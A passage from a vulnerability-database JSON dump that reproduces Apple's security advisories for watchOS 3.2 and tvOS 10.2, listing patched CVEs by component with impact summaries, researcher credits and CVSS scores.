of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 04, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of watchOS 3.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9643", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:4D5D6CE943DE7279F91D23CD74879D4C", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-01T00:00:00", "description": "# About the security content of tvOS 10.2\n\nThis document describes the security content of tvOS 10.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: natashenka of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of tvOS 10.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:C3300089BE0D932332C0D20113B0C302", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:40", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 